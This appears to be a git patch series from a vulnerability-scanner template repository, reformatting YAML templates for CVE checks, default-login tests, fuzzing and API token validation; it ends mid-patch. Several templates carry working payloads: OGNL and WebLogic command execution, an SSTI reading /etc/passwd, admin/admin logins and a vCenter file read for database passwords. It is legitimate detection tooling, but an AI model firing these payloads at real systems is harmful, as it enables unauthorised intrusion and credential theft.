From 53fc9bcb3f7b1d5f343c0d16c7cdcd6fda5be849 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 7 Oct 2021 05:23:20 +0530 Subject: [PATCH 01/39] misc fixes --- cves/2020/CVE-2020-9757.yaml | 2 ++ default-logins/apache/superset-default-login.yaml | 4 ++-- vulnerabilities/other/pdf-signer-ssti-to-rce.yaml | 2 ++ vulnerabilities/other/rconfig-rce.yaml | 2 +- 4 files changed, 7 insertions(+), 3 deletions(-) diff --git a/cves/2020/CVE-2020-9757.yaml b/cves/2020/CVE-2020-9757.yaml index fac0befccd..20bf91e5e0 100644 --- a/cves/2020/CVE-2020-9757.yaml +++ b/cves/2020/CVE-2020-9757.yaml @@ -22,6 +22,8 @@ requests: path: - "{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}" - "{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}" + + skip-variables-check: true matchers-condition: and matchers: - type: status diff --git a/default-logins/apache/superset-default-login.yaml b/default-logins/apache/superset-default-login.yaml index 26ec0e941e..6169088711 100644 --- a/default-logins/apache/superset-default-login.yaml +++ b/default-logins/apache/superset-default-login.yaml @@ -21,11 +21,11 @@ requests: Content-Type: application/x-www-form-urlencoded Referer: {{BaseURL}}/admin/airflow/login - csrf_token={{csrff_token}}&username=admin&password=admin + csrf_token={{csrf_token}}&username=admin&password=admin extractors: - type: regex - name: csrff_token + name: csrf_token group: 1 part: body internal: true diff --git a/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml b/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml index 889fd93cff..f1d82689fa 100644 --- a/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml +++ b/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml @@ -12,6 +12,8 @@ requests: - "{{BaseURL}}" headers: Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl" + + skip-variables-check: true matchers-condition: and matchers: - type: status diff --git a/vulnerabilities/other/rconfig-rce.yaml b/vulnerabilities/other/rconfig-rce.yaml index c08699eb6d..00bc474218 100644 --- a/vulnerabilities/other/rconfig-rce.yaml +++ b/vulnerabilities/other/rconfig-rce.yaml @@ -33,7 +33,7 @@ requests: --01b28e152ee044338224bf647275f8eb Content-Disposition: form-data; name="email" - test@{{randstr.tld}} + test@{{randstr}}.tld --01b28e152ee044338224bf647275f8eb Content-Disposition: form-data; name="editid" From 5072932509fd82b807c560f952ba776c00fc9263 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 10 Oct 2021 06:43:30 +0530 Subject: [PATCH 02/39] more updates --- cves/2013/CVE-2013-2251.yaml | 17 ++++++----------- cves/2017/CVE-2017-17562.yaml | 7 ++++--- cves/2019/CVE-2019-17382.yaml | 4 +++- cves/2020/CVE-2020-14882.yaml | 7 +++---- cves/2020/CVE-2020-7961.yaml | 3 ++- .../grafana/grafana-default-login.yaml | 16 ++++++---------- fuzzing/adminer-panel-fuzz.yaml | 6 +++--- fuzzing/mdb-database-file.yaml | 2 -- fuzzing/prestashop-module-fuzz.yaml | 6 +++--- fuzzing/wordpress-plugins-detect.yaml | 6 ++---- fuzzing/wordpress-themes-detect.yaml | 6 ++---- miscellaneous/ntlm-directories.yaml | 4 +--- .../gitlab/gitlab-user-enumeration.yaml | 3 +-- .../gitlab/gitlab-user-open-api.yaml | 3 +-- vulnerabilities/vmware/vmware-vcenter-lfi.yaml | 5 ++--- 15 files changed, 39 insertions(+), 56 deletions(-) diff --git a/cves/2013/CVE-2013-2251.yaml b/cves/2013/CVE-2013-2251.yaml index d322c7908c..67158a4a69 100644 --- a/cves/2013/CVE-2013-2251.yaml +++ b/cves/2013/CVE-2013-2251.yaml @@ -11,25 +11,19 @@ info: requests: - raw: - | - GET /index.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1 + GET /index.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1 Host: {{Hostname}} - Connection: close Accept: */* - Accept-Language: en - | - GET /login.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1 + GET /login.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1 Host: {{Hostname}} - Connection: close Accept: */* - Accept-Language: en - | - GET /index.action?§params§%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1 + GET /index.action?{{params}}%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1 Host: {{Hostname}} - Connection: close Accept: */* - Accept-Language: en payloads: params: @@ -40,11 +34,12 @@ requests: matchers-condition: and matchers: - type: status + condition: or status: - 200 - 400 - condition: or + - type: regex + part: body regex: - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" - part: body diff --git a/cves/2017/CVE-2017-17562.yaml b/cves/2017/CVE-2017-17562.yaml index 0f87ecde9f..7560cc422d 100644 --- a/cves/2017/CVE-2017-17562.yaml +++ b/cves/2017/CVE-2017-17562.yaml @@ -91,15 +91,16 @@ requests: - webviewer - welcome - attack: sniper stop-at-first-match: true matchers-condition: and matchers: + - type: status status: - 200 + - type: word + condition: and words: - "environment variable" - - "display library search paths" - condition: and + - "display library search paths" \ No newline at end of file diff --git a/cves/2019/CVE-2019-17382.yaml b/cves/2019/CVE-2019-17382.yaml index 163e4ead10..24cfb039e5 100644 --- a/cves/2019/CVE-2019-17382.yaml +++ b/cves/2019/CVE-2019-17382.yaml @@ -22,14 +22,16 @@ requests: payloads: ids: helpers/wordlists/numbers.txt - attack: sniper + threads: 50 stop-at-first-match: true matchers-condition: and matchers: + - type: status status: - 200 + - type: word words: - "Dashboard" diff --git a/cves/2020/CVE-2020-14882.yaml b/cves/2020/CVE-2020-14882.yaml index 382be20081..e36159a674 100644 --- a/cves/2020/CVE-2020-14882.yaml +++ b/cves/2020/CVE-2020-14882.yaml @@ -28,8 +28,7 @@ requests: - | POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1 Host: {{Hostname}} - cmd: §exec§ - Connection: close + cmd: {{exec}} Content-Type: application/x-www-form-urlencoded; charset=utf-8 _nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession%28%22var%20m%20%3D%20java.lang.Class.forName%28%22weblogic.work.ExecuteThread%22%29.getDeclaredMethod%28%22getCurrentWork%22%29%3B%20var%20currThread%20%3D%20java.lang.Thread.currentThread%28%29%3B%20var%20currWork%20%3D%20m.invoke%28currThread%29%3B%20var%20f2%20%3D%20currWork.getClass%28%29.getDeclaredField%28%22connectionHandler%22%29%3B%20f2.setAccessible%28true%29%3B%20var%20connectionHandler%20%3D%20f2.get%28currWork%29%3B%20var%20f3%20%3D%20connectionHandler.getClass%28%29.getDeclaredField%28%22request%22%29%3B%20f3.setAccessible%28true%29%3B%20var%20request%20%3D%20f3.get%28connectionHandler%29%3B%20var%20command%20%3D%20request.getHeader%28%22cmd%22%29%3B%20var%20response%20%3D%20request.getResponse%28%29%3B%20var%20isWin%20%3D%20java.lang.System.getProperty%28%22os.name%22%29.toLowerCase%28%29.contains%28%22win%22%29%3B%20var%20listCmd%20%3D%20new%20java.util.ArrayList%28%29%3B%20var%20p%20%3D%20new%20java.lang.ProcessBuilder%28%22%22%29%3B%20if%28isWin%29%7Bp.command%28%22cmd.exe%22%2C%20%22%2Fc%22%2C%20command%29%3B%20%7Delse%7Bp.command%28%22%2Fbin%2Fbash%22%2C%20%22-c%22%2C%20command%29%3B%20%7D%20p.redirectErrorStream%28true%29%3B%20var%20process%20%3D%20p.start%28%29%3B%20var%20output%20%3D%20process.getInputStream%28%29%3B%20var%20scanner%20%3D%20new%20java.util.Scanner%28output%29.useDelimiter%28%22%5C%5C%5C%5CA%22%29%3B%20var%20out%20%3D%20scanner.next%28%29%3B%20var%20outputStream%20%3D%20response.getServletOutputStream%28%29%3B%20outputStream.write%28out.getBytes%28%29%29%3B%20outputStream.flush%28%29%3B%20response.getWriter%28%29.write%28%22%22%29%3B%20currThread.interrupt%28%29%3B%22%29 @@ -41,12 +40,12 @@ requests: matchers-condition: and matchers: + - type: regex + condition: or regex: - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" - condition: or - part: body - type: status status: diff --git a/cves/2020/CVE-2020-7961.yaml b/cves/2020/CVE-2020-7961.yaml index dd62e8fa68..80017aa104 100644 --- a/cves/2020/CVE-2020-7961.yaml +++ b/cves/2020/CVE-2020-7961.yaml @@ -31,11 +31,12 @@ requests: command: - "systeminfo" # Windows - "lsb_release -a" # Linux - attack: sniper matchers-condition: and matchers: + - type: regex + condition: or regex: - "OS Name:.*Microsoft Windows" - "Distributor ID:" diff --git a/default-logins/grafana/grafana-default-login.yaml b/default-logins/grafana/grafana-default-login.yaml index efea21f9ff..2ea6e35861 100644 --- a/default-logins/grafana/grafana-default-login.yaml +++ b/default-logins/grafana/grafana-default-login.yaml @@ -1,4 +1,5 @@ id: grafana-default-login + info: name: Grafana Default Login author: pdteam @@ -19,30 +20,25 @@ requests: Referer: {{BaseURL}} content-type: application/json - {"user":"admin","password":"§grafana_password§"} - + {"user":"admin","password":"{{grafana_password}}"} payloads: grafana_password: - prom-operator - admin - attack: sniper - matchers-condition: and matchers: - type: word words: - - grafana_session + - "grafana_session" # Login cookie part: header - # Check for 'grafana_session' cookie on valid login in the response header. - type: word - words: - - Logged in part: body - # Check for valid string on valid login. + words: + - "Logged in" # Logged in keyword - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/fuzzing/adminer-panel-fuzz.yaml b/fuzzing/adminer-panel-fuzz.yaml index ad8ba27848..0676457b68 100644 --- a/fuzzing/adminer-panel-fuzz.yaml +++ b/fuzzing/adminer-panel-fuzz.yaml @@ -23,17 +23,17 @@ requests: payloads: path: helpers/wordlists/adminer-paths.txt - attack: sniper threads: 50 stop-at-first-match: true matchers-condition: and matchers: - type: word + condition: and words: - "- Adminer" - - "partial(verifyVersion, " - condition: and + - "partial(verifyVersion" + - type: status status: - 200 diff --git a/fuzzing/mdb-database-file.yaml b/fuzzing/mdb-database-file.yaml index 2fe78b348f..4eab49564e 100644 --- a/fuzzing/mdb-database-file.yaml +++ b/fuzzing/mdb-database-file.yaml @@ -14,12 +14,10 @@ requests: Host: {{Hostname}} Origin: {{BaseURL}} Accept-Language: en-US,en;q=0.9 - Connection: close payloads: mdbPaths: helpers/wordlists/mdb-paths.txt - attack: sniper threads: 50 max-size: 500 # Size in bytes - Max Size to read from server response stop-at-first-match: true diff --git a/fuzzing/prestashop-module-fuzz.yaml b/fuzzing/prestashop-module-fuzz.yaml index 63fd397d99..11072add7c 100644 --- a/fuzzing/prestashop-module-fuzz.yaml +++ b/fuzzing/prestashop-module-fuzz.yaml @@ -1,4 +1,5 @@ id: prestashop-module-fuzz + info: name: Prestashop Modules Enumeration author: meme-lord @@ -16,19 +17,18 @@ requests: payloads: path: helpers/wordlists/prestashop-modules.txt - attack: sniper - threads: 50 + threads: 50 matchers-condition: and matchers: - type: word + condition: and words: - "" - "" - "" - "" - "" - condition: and - type: status status: diff --git a/fuzzing/wordpress-plugins-detect.yaml b/fuzzing/wordpress-plugins-detect.yaml index 1af3f07971..c9f21082e4 100644 --- a/fuzzing/wordpress-plugins-detect.yaml +++ b/fuzzing/wordpress-plugins-detect.yaml @@ -1,4 +1,5 @@ id: wordpress-plugins-detect + info: name: WordPress Plugins Detection author: 0xcrypto @@ -13,11 +14,8 @@ requests: payloads: pluginSlug: helpers/wordlists/wordpress-plugins.txt - attack: sniper - threads: 50 - redirects: true - max-redirects: 1 + threads: 50 matchers-condition: and matchers: - type: status diff --git a/fuzzing/wordpress-themes-detect.yaml b/fuzzing/wordpress-themes-detect.yaml index 9343703599..dd98af2fe3 100644 --- a/fuzzing/wordpress-themes-detect.yaml +++ b/fuzzing/wordpress-themes-detect.yaml @@ -1,4 +1,5 @@ id: wordpress-themes-detect + info: name: WordPress Theme Detection author: 0xcrypto @@ -13,11 +14,8 @@ requests: payloads: themeSlug: helpers/wordlists/wordpress-themes.txt - attack: sniper - threads: 50 - redirects: true - max-redirects: 1 + threads: 50 matchers-condition: and matchers: - type: status diff --git a/miscellaneous/ntlm-directories.yaml b/miscellaneous/ntlm-directories.yaml index 1733d4647d..a36f3f1287 100644 --- a/miscellaneous/ntlm-directories.yaml +++ b/miscellaneous/ntlm-directories.yaml @@ -14,6 +14,7 @@ requests: Host: {{Hostname}} Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA= + threads: 50 payloads: path: - / @@ -63,9 +64,6 @@ requests: - /webticket/webticketservice.svcabs/ - /adfs/services/trust/2005/windowstransport - attack: sniper - threads: 50 - matchers-condition: and matchers: - type: dsl diff --git a/vulnerabilities/gitlab/gitlab-user-enumeration.yaml b/vulnerabilities/gitlab/gitlab-user-enumeration.yaml index 70867414e7..869b0ddd14 100644 --- a/vulnerabilities/gitlab/gitlab-user-enumeration.yaml +++ b/vulnerabilities/gitlab/gitlab-user-enumeration.yaml @@ -16,10 +16,9 @@ requests: Accept: application/json, text/plain, */* Referer: {{BaseURL}} + threads: 50 payloads: user: helpers/wordlists/user-list.txt - attack: sniper - threads: 50 matchers-condition: and matchers: diff --git a/vulnerabilities/gitlab/gitlab-user-open-api.yaml b/vulnerabilities/gitlab/gitlab-user-open-api.yaml index e6b7567303..8302f25e2a 100644 --- a/vulnerabilities/gitlab/gitlab-user-open-api.yaml +++ b/vulnerabilities/gitlab/gitlab-user-open-api.yaml @@ -15,10 +15,9 @@ requests: Accept: application/json, text/plain, */* Referer: {{BaseURL}} + threads: 50 payloads: uid: helpers/wordlists/numbers.txt - attack: sniper - threads: 50 matchers-condition: and matchers: diff --git a/vulnerabilities/vmware/vmware-vcenter-lfi.yaml b/vulnerabilities/vmware/vmware-vcenter-lfi.yaml index 2fc7c98a9e..9ee7ce40bb 100644 --- a/vulnerabilities/vmware/vmware-vcenter-lfi.yaml +++ b/vulnerabilities/vmware/vmware-vcenter-lfi.yaml @@ -12,7 +12,7 @@ info: requests: - raw: - | - GET /eam/vib?id=§path§\vcdb.properties HTTP/1.1 + GET /eam/vib?id={{path}}\vcdb.properties HTTP/1.1 Host: {{Hostname}} payloads: @@ -20,14 +20,13 @@ requests: - "C:\\ProgramData\\VMware\\VMware+VirtualCenter" # vCenter Server 5.5 and earlier (Windows 2008) - "C:\\Documents+and+Settings\\All+Users\\Application+Data\\VMware\\VMware+VirtualCenter" # Other Windows versions - "C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx" # vCenter Server => 6.0 - attack: sniper matchers-condition: and matchers: - type: regex regex: - "(?m)^(driver|dbtype|password(\\.encrypted)?)\\s=" - part: body + - type: status status: - 200 From 5b8e87ac0c6b82af7ca98e9ed8a6ba88181de01d Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 14 Oct 2021 23:56:45 +0530 Subject: [PATCH 03/39] Adding self contained template identifier --- .nuclei-ignore | 5 ----- token-spray/asana.yaml | 1 + token-spray/bingmaps.yaml | 1 + token-spray/bitly.yaml | 1 + token-spray/buildkite.yaml | 1 + token-spray/buttercms.yaml | 1 + token-spray/calendly.yaml | 1 + token-spray/circleci.yaml | 1 + token-spray/deviantart.yaml | 1 + token-spray/dropbox.yaml | 1 + token-spray/github.yaml | 1 + token-spray/google-autocomplete.yaml | 1 + token-spray/google-customsearch.yaml | 1 + token-spray/google-directions.yaml | 1 + token-spray/google-elevation.yaml | 1 + token-spray/google-fcm.yaml | 1 + token-spray/google-findplacefromtext.yaml | 1 + token-spray/google-gedistancematrix.yaml | 1 + token-spray/google-geocode.yaml | 1 + token-spray/google-geolocation.yaml | 1 + token-spray/google-mapsembed.yaml | 1 + token-spray/google-mapsembedadvanced.yaml | 1 + token-spray/google-nearbysearch.yaml | 1 + token-spray/google-nearestroads.yaml | 1 + token-spray/google-placedetails.yaml | 1 + token-spray/google-placesphoto.yaml | 1 + token-spray/google-playablelocations.yaml | 1 + token-spray/google-routetotraveled.yaml | 1 + token-spray/google-speedlimit.yaml | 1 + token-spray/google-staticmaps.yaml | 1 + token-spray/google-streetview.yaml | 1 + token-spray/google-timezone.yaml | 1 + token-spray/googlet-extsearchplaces.yaml | 1 + token-spray/heroku.yaml | 1 + token-spray/hubspot.yaml | 1 + token-spray/instagram.yaml | 1 + token-spray/ipstack.yaml | 1 + token-spray/iterable.yaml | 1 + token-spray/jumpcloud.yaml | 1 + token-spray/lokalise.yaml | 1 + token-spray/loqate.yaml | 1 + token-spray/mailchimp.yaml | 1 + token-spray/mailgun.yaml | 1 + token-spray/mapbox.yaml | 1 + token-spray/nerdgraph.yaml | 1 + token-spray/npm.yaml | 1 + token-spray/openweather.yaml | 1 + token-spray/pagerduty.yaml | 1 + token-spray/pendo.yaml | 1 + token-spray/pivotaltracker.yaml | 1 + token-spray/postmark.yaml | 1 + token-spray/sendgrid.yaml | 1 + token-spray/slack.yaml | 1 + token-spray/sonarcloud.yaml | 1 + token-spray/spotify.yaml | 1 + token-spray/square.yaml | 1 + token-spray/stripe.yaml | 1 + token-spray/tinypng.yaml | 1 + token-spray/travisci.yaml | 1 + token-spray/twitter.yaml | 1 + token-spray/visualstudio.yaml | 1 + token-spray/wakatime.yaml | 1 + token-spray/weglot.yaml | 1 + token-spray/youtube.yaml | 1 + 64 files changed, 63 insertions(+), 5 deletions(-) diff --git a/.nuclei-ignore b/.nuclei-ignore index 26f85418fb..bef00b4d7a 100644 --- a/.nuclei-ignore +++ b/.nuclei-ignore @@ -14,8 +14,3 @@ tags: # files is a list of files to ignore template execution # unless asked for by the user. - -files: - - "token-spray/" - - diff --git a/token-spray/asana.yaml b/token-spray/asana.yaml index 9282cf7a4d..08645bbe99 100644 --- a/token-spray/asana.yaml +++ b/token-spray/asana.yaml @@ -14,6 +14,7 @@ requests: headers: Authorization: Bearer {{token}} + self-contained: true matchers: - type: status status: diff --git a/token-spray/bingmaps.yaml b/token-spray/bingmaps.yaml index 0892d85b9f..86e6784911 100644 --- a/token-spray/bingmaps.yaml +++ b/token-spray/bingmaps.yaml @@ -12,6 +12,7 @@ requests: path: - "https://dev.virtualearth.net/REST/v1/Locations?CountryRegion=US&adminDistrict=WA&locality=Somewhere&postalCode=98001&addressLine=100%20Main%20St.&key={{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/bitly.yaml b/token-spray/bitly.yaml index 57e1d5d3d4..31eea7a7e7 100644 --- a/token-spray/bitly.yaml +++ b/token-spray/bitly.yaml @@ -12,6 +12,7 @@ requests: path: - "https://api-ssl.bitly.com/v3/shorten?access_token={{token}}&longUrl=https://www.google.com" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/buildkite.yaml b/token-spray/buildkite.yaml index 77e8e1e677..c2129bc7dd 100644 --- a/token-spray/buildkite.yaml +++ b/token-spray/buildkite.yaml @@ -14,6 +14,7 @@ requests: headers: Authorization: Bearer {{token}} + self-contained: true matchers: - type: status status: diff --git a/token-spray/buttercms.yaml b/token-spray/buttercms.yaml index 229da7b1d5..f37c091c85 100644 --- a/token-spray/buttercms.yaml +++ b/token-spray/buttercms.yaml @@ -12,6 +12,7 @@ requests: path: - "https://api.buttercms.com/v2/posts/?auth_token={{token}}" + self-contained: true matchers: - type: status status: diff --git a/token-spray/calendly.yaml b/token-spray/calendly.yaml index 1d8289fb37..1f2c1f434e 100644 --- a/token-spray/calendly.yaml +++ b/token-spray/calendly.yaml @@ -14,6 +14,7 @@ requests: headers: X-Token: "{{token}}" + self-contained: true matchers: - type: status status: diff --git a/token-spray/circleci.yaml b/token-spray/circleci.yaml index 281d22b656..0e1d78ca22 100644 --- a/token-spray/circleci.yaml +++ b/token-spray/circleci.yaml @@ -12,6 +12,7 @@ requests: path: - "https://circleci.com/api/v1.1/me?circle-token={{token}}" + self-contained: true matchers: - type: status status: diff --git a/token-spray/deviantart.yaml b/token-spray/deviantart.yaml index 403b97a349..96b90b34b1 100644 --- a/token-spray/deviantart.yaml +++ b/token-spray/deviantart.yaml @@ -13,6 +13,7 @@ requests: - "https://www.deviantart.com/api/v1/oauth2/placebo" body: "access_token={{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/dropbox.yaml b/token-spray/dropbox.yaml index 29679e2b2f..e1f7bf1625 100644 --- a/token-spray/dropbox.yaml +++ b/token-spray/dropbox.yaml @@ -14,6 +14,7 @@ requests: headers: Authorization: Bearer {{token}} + self-contained: true matchers: - type: status status: diff --git a/token-spray/github.yaml b/token-spray/github.yaml index c6d1d560de..944225f0fe 100644 --- a/token-spray/github.yaml +++ b/token-spray/github.yaml @@ -14,6 +14,7 @@ requests: headers: Authorization: Basic {{base64('user:' + token)}} + self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-autocomplete.yaml b/token-spray/google-autocomplete.yaml index b3c459082e..d6fee5de42 100644 --- a/token-spray/google-autocomplete.yaml +++ b/token-spray/google-autocomplete.yaml @@ -11,6 +11,7 @@ requests: path: - "https://maps.googleapis.com/maps/api/place/autocomplete/json?input=Bingh&types=%28cities%29&key={{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-customsearch.yaml b/token-spray/google-customsearch.yaml index 0be1636139..0a77ff06fb 100644 --- a/token-spray/google-customsearch.yaml +++ b/token-spray/google-customsearch.yaml @@ -11,6 +11,7 @@ requests: path: - "https://www.googleapis.com/customsearch/v1?cx=017576662512468239146:omuauf_lfve&q=lectures&key={{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-directions.yaml b/token-spray/google-directions.yaml index a6b8cea46b..483224144e 100644 --- a/token-spray/google-directions.yaml +++ b/token-spray/google-directions.yaml @@ -11,6 +11,7 @@ requests: path: - "https://maps.googleapis.com/maps/api/directions/json?origin=Disneyland&destination=Universal+Studios+Hollywood4&key={{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-elevation.yaml b/token-spray/google-elevation.yaml index 480bc31fb7..a9b2e001c7 100644 --- a/token-spray/google-elevation.yaml +++ b/token-spray/google-elevation.yaml @@ -11,6 +11,7 @@ requests: path: - "https://maps.googleapis.com/maps/api/elevation/json?locations=39.7391536,-104.9847034&key={{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-fcm.yaml b/token-spray/google-fcm.yaml index aba6f43579..ebb916fbe5 100644 --- a/token-spray/google-fcm.yaml +++ b/token-spray/google-fcm.yaml @@ -15,6 +15,7 @@ requests: Authorization: key={{token}} Content-Type: application/json + self-contained: true matchers: - type: status status: diff --git a/token-spray/google-findplacefromtext.yaml b/token-spray/google-findplacefromtext.yaml index dcecba34b2..0a4a93b767 100644 --- a/token-spray/google-findplacefromtext.yaml +++ b/token-spray/google-findplacefromtext.yaml @@ -11,6 +11,7 @@ requests: path: - "https://maps.googleapis.com/maps/api/place/findplacefromtext/json?input=Museum%20of%20Contemporary%20Art%20Australia&inputtype=textquery&fields=photos,formatted_address,name,rating,opening_hours,geometry&key={{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-gedistancematrix.yaml b/token-spray/google-gedistancematrix.yaml index 62795ea15e..5eaf5abb5d 100644 --- a/token-spray/google-gedistancematrix.yaml +++ b/token-spray/google-gedistancematrix.yaml @@ -11,6 +11,7 @@ requests: path: - "https://maps.googleapis.com/maps/api/distancematrix/json?units=imperial&origins=40.6655101,-73.89188969999998&destinations=40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626&key={{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-geocode.yaml b/token-spray/google-geocode.yaml index 91826af391..21d1ea1781 100644 --- a/token-spray/google-geocode.yaml +++ b/token-spray/google-geocode.yaml @@ -11,6 +11,7 @@ requests: path: - "https://maps.googleapis.com/maps/api/geocode/json?latlng=40,30&key={{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-geolocation.yaml b/token-spray/google-geolocation.yaml index 88d1ce9ffc..07684fe0e1 100644 --- a/token-spray/google-geolocation.yaml +++ b/token-spray/google-geolocation.yaml @@ -12,6 +12,7 @@ requests: - "https://www.googleapis.com/geolocation/v1/geolocate?key={{token}}" matchers-condition: and + self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-mapsembed.yaml b/token-spray/google-mapsembed.yaml index d7b47585f1..d7d9c5e05f 100644 --- a/token-spray/google-mapsembed.yaml +++ b/token-spray/google-mapsembed.yaml @@ -11,6 +11,7 @@ requests: path: - "https://www.google.com/maps/embed/v1/place?q=Seattle&key={{token}}" + self-contained: true matchers: - type: status status: diff --git a/token-spray/google-mapsembedadvanced.yaml b/token-spray/google-mapsembedadvanced.yaml index 5f8e4d2721..8fd69d623d 100644 --- a/token-spray/google-mapsembedadvanced.yaml +++ b/token-spray/google-mapsembedadvanced.yaml @@ -11,6 +11,7 @@ requests: path: - "https://www.google.com/maps/embed/v1/search?q=record+stores+in+Seattle&key={{token}}" + self-contained: true matchers: - type: status status: diff --git a/token-spray/google-nearbysearch.yaml b/token-spray/google-nearbysearch.yaml index 752d9d9814..d40f6d479c 100644 --- a/token-spray/google-nearbysearch.yaml +++ b/token-spray/google-nearbysearch.yaml @@ -11,6 +11,7 @@ requests: path: - "https://maps.googleapis.com/maps/api/place/nearbysearch/json?location=-33.8670522,151.1957362&radius=100&types=food&name=harbour&key={{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-nearestroads.yaml b/token-spray/google-nearestroads.yaml index e804422ff0..ab8ebf2b98 100644 --- a/token-spray/google-nearestroads.yaml +++ b/token-spray/google-nearestroads.yaml @@ -11,6 +11,7 @@ requests: path: - "https://roads.googleapis.com/v1/nearestRoads?points=60.170880,24.942795|60.170879,24.942796|60.170877,24.942796&key={{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-placedetails.yaml b/token-spray/google-placedetails.yaml index 30ca3e6184..3a9935ba6a 100644 --- a/token-spray/google-placedetails.yaml +++ b/token-spray/google-placedetails.yaml @@ -11,6 +11,7 @@ requests: path: - "https://maps.googleapis.com/maps/api/place/details/json?place_id=ChIJN1t_tDeuEmsRUsoyG83frY4&fields=name,rating,formatted_phone_number&key={{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-placesphoto.yaml 